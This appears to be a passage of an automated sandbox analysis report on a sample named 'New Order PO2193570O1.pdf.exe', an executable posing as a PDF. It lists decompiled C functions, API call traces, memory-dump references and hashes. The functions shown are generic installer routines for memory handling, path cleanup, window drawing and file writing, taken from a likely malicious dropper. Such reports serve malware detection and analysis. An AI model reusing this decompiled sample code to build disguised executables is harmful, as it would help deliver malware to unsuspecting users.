                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                                              • String ID: %s=%s$0&B$[Rename]
                                                                                                                              • API String ID: 3772915668-951905037
                                                                                                                              • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                                              • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                                              • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                                              • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B24D8, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 124COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 77%
                                                                                                                              			E709B24D8(intOrPtr* _a4) {
				char _v80;
				int _v84;
				intOrPtr _v88;
				short _v92;
				intOrPtr* _t28;
				void* _t30;
				intOrPtr _t31;
				signed int _t43;
				void* _t44;
				intOrPtr _t45;
				void* _t48;

				_t44 = E709B1215();
				_t28 = _a4;
				_t45 =  *((intOrPtr*)(_t28 + 0x814));
				_v88 = _t45;
				_t48 = (_t45 + 0x41 << 5) + _t28;
				do {
					if( *((intOrPtr*)(_t48 - 4)) >= 0) {
					}
					_t43 =  *(_t48 - 8) & 0x000000ff;
					if(_t43 <= 7) {
						switch( *((intOrPtr*)(_t43 * 4 +  &M709B2626))) {
							case 0:
								 *_t44 = 0;
								goto L17;
							case 1:
								__eax =  *__eax;
								if(__ecx > __ebx) {
									_v84 = __ecx;
									__ecx =  *(0x709b307c + __edx * 4);
									__edx = _v84;
									__ecx = __ecx * __edx;
									asm("sbb edx, edx");
									__edx = __edx & __ecx;
									__eax = __eax &  *(0x709b309c + __edx * 4);
								}
								_push(__eax);
								goto L15;
							case 2:
								__eax = E709B1429(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L16;
							case 3:
								__eax = lstrcpynA(__edi,  *__eax,  *0x709b405c);
								goto L17;
							case 4:
								__ecx =  *0x709b405c;
								__edx = __ecx - 1;
								__eax = WideCharToMultiByte(__ebx, __ebx,  *__eax, __ecx, __edi, __edx, __ebx, __ebx);
								__eax =  *0x709b405c;
								 *((char*)(__eax + __edi - 1)) = __bl;
								goto L17;
							case 5:
								__ecx =  &_v80;
								_push(0x27);
								_push(__ecx);
								_push( *__eax);
								__imp__StringFromGUID2();
								__eax =  &_v92;
								__eax = WideCharToMultiByte(__ebx, __ebx,  &_v92,  &_v92, __edi,  *0x709b405c, __ebx, __ebx);
								goto L17;
							case 6:
								_push( *__esi);
								L15:
								__eax = wsprintfA(__edi, 0x709b4000);
								L16:
								__esp = __esp + 0xc;
								goto L17;
						}
					}
					L17:
					_t30 =  *(_t48 + 0x14);
					if(_t30 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t48 - 4)) > 0)) {
						GlobalFree(_t30);
					}
					_t31 =  *((intOrPtr*)(_t48 + 0xc));
					if(_t31 != 0) {
						if(_t31 != 0xffffffff) {
							if(_t31 > 0) {
								E709B12D1(_t31 - 1, _t44);
								goto L26;
							}
						} else {
							E709B1266(_t44);
							L26:
						}
					}
					_v88 = _v88 - 1;
					_t48 = _t48 - 0x20;
				} while (_v88 >= 0);
				return GlobalFree(_t44);
			}














                                                                                                                              0x709b24e4
                                                                                                                              0x709b24e6
                                                                                                                              0x709b24f0
                                                                                                                              0x709b24f6
                                                                                                                              0x709b2500
                                                                                                                              0x709b2504
                                                                                                                              0x709b2509
                                                                                                                              0x709b2509
                                                                                                                              0x709b2511
                                                                                                                              0x709b2518
                                                                                                                              0x709b251e
                                                                                                                              0x00000000
                                                                                                                              0x709b2525
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b252c
                                                                                                                              0x709b2530
                                                                                                                              0x709b2533
                                                                                                                              0x709b2537
                                                                                                                              0x709b253e
                                                                                                                              0x709b2542
                                                                                                                              0x709b2548
                                                                                                                              0x709b254a
                                                                                                                              0x709b254c
                                                                                                                              0x709b254c
                                                                                                                              0x709b2553
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b255c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b256c
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2598
                                                                                                                              0x709b25a0
                                                                                                                              0x709b25aa
                                                                                                                              0x709b25ac
                                                                                                                              0x709b25b1
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2574
                                                                                                                              0x709b2578
                                                                                                                              0x709b257a
                                                                                                                              0x709b257b
                                                                                                                              0x709b257d
                                                                                                                              0x709b258d
                                                                                                                              0x709b2594
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b25b7
                                                                                                                              0x709b25b9
                                                                                                                              0x709b25bf
                                                                                                                              0x709b25c5
                                                                                                                              0x709b25c5
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b251e
                                                                                                                              0x709b25c8
                                                                                                                              0x709b25c8
                                                                                                                              0x709b25cd
                                                                                                                              0x709b25de
                                                                                                                              0x709b25de
                                                                                                                              0x709b25e4
                                                                                                                              0x709b25e9
                                                                                                                              0x709b25ee
                                                                                                                              0x709b25fa
                                                                                                                              0x709b25ff
                                                                                                                              0x00000000
                                                                                                                              0x709b2604
                                                                                                                              0x709b25f0
                                                                                                                              0x709b25f1
                                                                                                                              0x709b2605
                                                                                                                              0x709b2605
                                                                                                                              0x709b25ee
                                                                                                                              0x709b2606
                                                                                                                              0x709b260a
                                                                                                                              0x709b260d
                                                                                                                              0x709b2625

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 709B1215: GlobalAlloc.KERNELBASE(00000040,709B1233,?,709B12CF,-709B404B,709B11AB,-000000A0), ref: 709B121D
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B25DE
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B2618
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$Free$Alloc
                                                                                                                              • String ID: {t@ut
                                                                                                                              • API String ID: 1780285237-3262140062
                                                                                                                              • Opcode ID: 5c9dd337e11d9766d28fa5e1169d1198b39759a2e6ca631efed1a224469dcd9a
                                                                                                                              • Instruction ID: 49fc3eec2e4482c962a80969493f92bb7a242c0dec1127896b7e1f00a518c415
                                                                                                                              • Opcode Fuzzy Hash: 5c9dd337e11d9766d28fa5e1169d1198b39759a2e6ca631efed1a224469dcd9a
                                                                                                                              • Instruction Fuzzy Hash: D741C072108280EFC312DF54CCD4DAF77BEEB85624B204A2DF50187220D779A904EB63
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 709B22F1, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 86%
                                                                                                                              			E709B22F1(void* __edx, intOrPtr _a4) {
				signed int _v4;
				signed int _v8;
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				signed int* _t50;
				signed char* _t51;

				_v8 = 0 |  *((intOrPtr*)(_a4 + 0x814)) > 0x00000000;
				while(1) {
					_t9 = _a4 + 0x818; // 0x818
					_t51 = (_v8 << 5) + _t9;
					_t38 = _t51[0x18];
					if(_t38 == 0) {
						goto L9;
					}
					_t48 = 0x1a;
					if(_t38 == _t48) {
						goto L9;
					}
					if(_t38 != 0xffffffff) {
						if(_t38 <= 0 || _t38 > 0x19) {
							_t51[0x18] = _t48;
						} else {
							_t38 = E709B12AD(_t38 - 1);
							L10:
						}
						goto L11;
					} else {
						_t38 = E709B123B();
						L11:
						_t43 = _t38;
						_t13 =  &(_t51[8]); // 0x820
						_t50 = _t13;
						if(_t51[4] >= 0) {
						}
						_t39 =  *_t51 & 0x000000ff;
						_t51[0x1c] = _t51[0x1c] & 0x00000000;
						_v4 = _t39;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t43);
							if(_v8 == 0) {
								return _t40;
							}
							if(_v8 !=  *((intOrPtr*)(_a4 + 0x814))) {
								_v8 = _v8 + 1;
							} else {
								_v8 = _v8 & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M709B247E))) {
								case 0:
									 *_t50 =  *_t50 & 0x00000000;
									goto L27;
								case 1:
									__eax = E709B12FE(__ebx);
									goto L20;
								case 2:
									 *__ebp = E709B12FE(__ebx);
									_a4 = __edx;
									goto L27;
								case 3:
									__eax = E709B1224(__ebx);
									 *(__esi + 0x1c) = __eax;
									L20:
									 *__ebp = __eax;
									goto L27;
								case 4:
									 *0x709b405c =  *0x709b405c +  *0x709b405c;
									__edi = GlobalAlloc(0x40,  *0x709b405c +  *0x709b405c);
									 *0x709b405c = MultiByteToWideChar(0, 0, __ebx,  *0x709b405c, __edi,  *0x709b405c);
									if(_v4 != 5) {
										 *(__esi + 0x1c) = __edi;
										 *__ebp = __edi;
									} else {
										__eax = GlobalAlloc(0x40, 0x10);
										_push(__eax);
										 *(__esi + 0x1c) = __eax;
										_push(__edi);
										 *__ebp = __eax;
										__imp__CLSIDFromString();
										__eax = GlobalFree(__edi);
									}
									goto L27;
								case 5:
									if( *__ebx != 0) {
										__eax = E709B12FE(__ebx);
										 *__edi = __eax;
									}
									goto L27;
								case 6:
									__esi =  *(__esi + 0x18);
									__esi = __esi - 1;
									__esi = __esi *  *0x709b405c;
									__esi = __esi +  *0x709b4064;
									__eax = __esi + 0xc;
									 *__edi = __esi + 0xc;
									asm("cdq");
									__eax = E709B1429(__edx, __esi + 0xc, __edx, __esi);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E709B1224(0x709b4034);
					goto L10;
				}
			}












                                                                                                                              0x709b2306
                                                                                                                              0x709b230a
                                                                                                                              0x709b2315
                                                                                                                              0x709b2315
                                                                                                                              0x709b231c
                                                                                                                              0x709b2321
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2325
                                                                                                                              0x709b2328
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b232d
                                                                                                                              0x709b2338
                                                                                                                              0x709b2348
                                                                                                                              0x709b233f
                                                                                                                              0x709b2341
                                                                                                                              0x709b2357
                                                                                                                              0x709b2357
                                                                                                                              0x00000000
                                                                                                                              0x709b232f
                                                                                                                              0x709b232f
                                                                                                                              0x709b2358
                                                                                                                              0x709b235c
                                                                                                                              0x709b235e
                                                                                                                              0x709b235e
                                                                                                                              0x709b2361
                                                                                                                              0x709b2361
                                                                                                                              0x709b2369
                                                                                                                              0x709b236c
                                                                                                                              0x709b2373
                                                                                                                              0x709b2377
                                                                                                                              0x709b2446
                                                                                                                              0x709b2447
                                                                                                                              0x709b2452
                                                                                                                              0x709b247d
                                                                                                                              0x709b247d
                                                                                                                              0x709b2462
                                                                                                                              0x709b246e
                                                                                                                              0x709b2464
                                                                                                                              0x709b2464
                                                                                                                              0x709b2464
                                                                                                                              0x00000000
                                                                                                                              0x709b237d
                                                                                                                              0x709b237d
                                                                                                                              0x00000000
                                                                                                                              0x709b2384
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b238d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b239b
                                                                                                                              0x709b239e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b23a7
                                                                                                                              0x709b23ac
                                                                                                                              0x709b23af
                                                                                                                              0x709b23b0
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b23bd
                                                                                                                              0x709b23c8
                                                                                                                              0x709b23d7
                                                                                                                              0x709b23e2
                                                                                                                              0x709b2405
                                                                                                                              0x709b2408
                                                                                                                              0x709b23e4
                                                                                                                              0x709b23e8
                                                                                                                              0x709b23ee
                                                                                                                              0x709b23ef
                                                                                                                              0x709b23f2
                                                                                                                              0x709b23f3
                                                                                                                              0x709b23f6
                                                                                                                              0x709b23fd
                                                                                                                              0x709b23fd
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2410
                                                                                                                              0x709b2413
                                                                                                                              0x709b241f
                                                                                                                              0x709b2421
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b2424
                                                                                                                              0x709b2427
                                                                                                                              0x709b2428
                                                                                                                              0x709b242f
                                                                                                                              0x709b2436
                                                                                                                              0x709b2439
                                                                                                                              0x709b243b
                                                                                                                              0x709b243e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x709b237d
                                                                                                                              0x709b2377
                                                                                                                              0x709b234d
                                                                                                                              0x709b2352
                                                                                                                              0x00000000
                                                                                                                              0x709b2352

                                                                                                                              APIs
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B2447
                                                                                                                                • Part of subcall function 709B1224: lstrcpynA.KERNEL32(00000000,?,709B12CF,-709B404B,709B11AB,-000000A0), ref: 709B1234
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 709B23C2
                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 709B23D7
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 709B23E8
                                                                                                                              • CLSIDFromString.OLE32(00000000,00000000), ref: 709B23F6
                                                                                                                              • GlobalFree.KERNEL32 ref: 709B23FD
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.204153248.00000000709B1000.00000020.00020000.sdmp, Offset: 709B0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.204144717.00000000709B0000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204159626.00000000709B3000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.204167409.00000000709B5000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                              • String ID: @ut
                                                                                                                              • API String ID: 3730416702-3384101347
                                                                                                                              • Opcode ID: 68cd3ade0db1ce280a6d9e8590ab25864d362d6f069e56096e6fa919e7df1ed7
                                                                                                                              • Instruction ID: 5d328c62db407c844a0aeba8adbe447883a9041ff5cbc1dd8c2686b8bd52cd2d
                                                                                                                              • Opcode Fuzzy Hash: 68cd3ade0db1ce280a6d9e8590ab25864d362d6f069e56096e6fa919e7df1ed7
                                                                                                                              • Instruction Fuzzy Hash: F4417971508380EFD3119F61C844BAE77EEFB44731F20892EF56686A60DB3CA9449B63
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00405DC8, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00405DC8(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004056C6(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E00405684("*?|<>/\":", _t5))) == 0) {
							E004057FE(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}








                                                                                                                              0x00405dca
                                                                                                                              0x00405dd2
                                                                                                                              0x00405de6
                                                                                                                              0x00405de6
                                                                                                                              0x00405dec
                                                                                                                              0x00405df9
                                                                                                                              0x00405df9
                                                                                                                              0x00405dfa
                                                                                                                              0x00405dfc
                                                                                                                              0x00405e00
                                                                                                                              0x00405e02
                                                                                                                              0x00405e0b
                                                                                                                              0x00405e0d
                                                                                                                              0x00405e27
                                                                                                                              0x00405e2f
                                                                                                                              0x00405e2f
                                                                                                                              0x00405e34
                                                                                                                              0x00405e36
                                                                                                                              0x00405e38
                                                                                                                              0x00405e3c
                                                                                                                              0x00405e3d
                                                                                                                              0x00405e40
                                                                                                                              0x00405e48
                                                                                                                              0x00405e4a
                                                                                                                              0x00405e4e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405e54
                                                                                                                              0x00405e59
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00405e59
                                                                                                                              0x00405e5e

                                                                                                                              APIs
                                                                                                                              • CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E20
                                                                                                                              • CharNextA.USER32(?,?,?,00000000), ref: 00405E2D
                                                                                                                              • CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E32
                                                                                                                              • CharPrevA.USER32(?,?,"C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,00403214,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405E42
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Char$Next$Prev
                                                                                                                              • String ID: "C:\Users\user\Desktop\New Order PO2193570O1.pdf.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                              • API String ID: 589700163-2371450298
                                                                                                                              • Opcode ID: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                              • Instruction ID: 3b6179abbfe29fc78842bf11aa846075366cc437f950451d76d565b88bc2b460
                                                                                                                              • Opcode Fuzzy Hash: d60fa47d96b079028a76cfcdb2d30976ede71f36b1f4f1e1bc9c50cb25bd2be5
                                                                                                                              • Instruction Fuzzy Hash: A0110861805B9129EB3227284C48BBB7F89CF66754F18447FD8C4722C2C67C5D429FAD
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00403F7F, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 100%
                                                                                                                              			E00403F7F(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                                                                              0x00403f91
                                                                                                                              0x00404025
                                                                                                                              0x00000000
                                                                                                                              0x00404025
                                                                                                                              0x00403fa2
                                                                                                                              0x00403fa6
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00403fac
                                                                                                                              0x00403fb5
                                                                                                                              0x00403fb8
                                                                                                                              0x00403fb8
                                                                                                                              0x00403fbe
                                                                                                                              0x00403fc4
                                                                                                                              0x00403fc4
                                                                                                                              0x00403fd0
                                                                                                                              0x00403fd6
                                                                                                                              0x00403fdd
                                                                                                                              0x00403fe0
                                                                                                                              0x00403fe3
                                                                                                                              0x00403fe5
                                                                                                                              0x00403fe5
                                                                                                                              0x00403fed
                                                                                                                              0x00403ff3
                                                                                                                              0x00403ff3
                                                                                                                              0x00403ffd
                                                                                                                              0x00404002
                                                                                                                              0x00404005
                                                                                                                              0x0040400a
                                                                                                                              0x0040400d
                                                                                                                              0x0040400d
                                                                                                                              0x0040401d
                                                                                                                              0x0040401d
                                                                                                                              0x00000000

                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.201984153.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.201978360.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.201994006.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202000566.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202075629.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202089293.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202121649.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202148009.000000000042F000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202159816.0000000000433000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202170813.0000000000437000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202189588.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                              • Associated: 00000000.00000002.202210290.000000000043C000.00000002.00020000.sdmp Download File
                                                                                                                              Similarity
                                                                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2320649405-0
                                                                                                                              • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                              • Instruction ID: 4cc26f8bf5fc777f430f8318c3ba194748f169832e683f7fcd21add738ba3f9d
                                                                                                                              • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                                              • Instruction Fuzzy Hash: C221C371904705ABCB209F78DD08B4BBBF8AF40711F048A29F992F26E0C738E904CB55
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 0040267C, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 93%
                                                                                                                              			E0040267C(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029F6(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004056C6(_t52) == 0) {
					E004029F6(0xffffffed);
				}
				E0040581E(_t52);
				_t27 = E0040583D(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0x30400
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031F1(_t47);
						E004031BF(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F18(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E004057FE( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F18(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                                                                                                              0x0040267c
                                                                                                                              0x0040267e
                                                                                                                              0x0040268a
                                                                                                                              0x0040268d
                                                                                                                              0x00402697
                                                                                                                              0x0040269b
                                                                                                                              0x0040269b
                                                                                                                              0x004026a1
                                                                                                                              0x004026ae
                                                                                                                              0x004026b6
                                                                                                                              0x004026b9
                                                                                                                              0x004026bf
                                                                                                                              0x004026cd
                                                                                                                              0x004026d2
                                                                                                                              0x004026d6
                                                                                                                              0x004026d9
                                                                                                                              0x004026e2
                                                                                                                              0x004026ee
                                                                                                                              0x004026f2
                                                                                                                              0x004026f5
                                                                                                                              0x004026ff
                                                                                                                              0x0040271e
                                                                                                                              0x00402706
                                                                                                                              0x0040270b
                                                                                                                              0x00402713
                                                                                                                              0x00402716
                                                                                                                              0x0040271b
                                                                                                                              0x0040271b
                                                                                                                              0x00402725
                                                                                                                              0x00402725
                                                                                                                              0x00402737
                                                                                                                              0x0040273e
                                                                                                                              0x00402750
                                                                                                                              0x00402750
                                                                                                                              0x00402756
                                                                                                                              0x00402756
                                                                                                                              0x00402761
                                                                                                                              0x00402762
                                                                                                                              0x00402766
                                                                                                                              0x0040276a
                                                                                                                              0x00402770
                                                                                                                              0x00402770
                                                                                                                              0x00402777
                                                                                                                              0x00402164
                                                                                                                              0x0040288e
                                                                                                                              0x0040289a

                                                                                                                              APIs
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00030400,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026D0
                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026EC
                                                                                                                              • GlobalFree.KERNEL32 ref: 00402725
                                                                                                                              • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402737
                                                                                                                              • GlobalFree.KERNEL32 ref: 0040273E
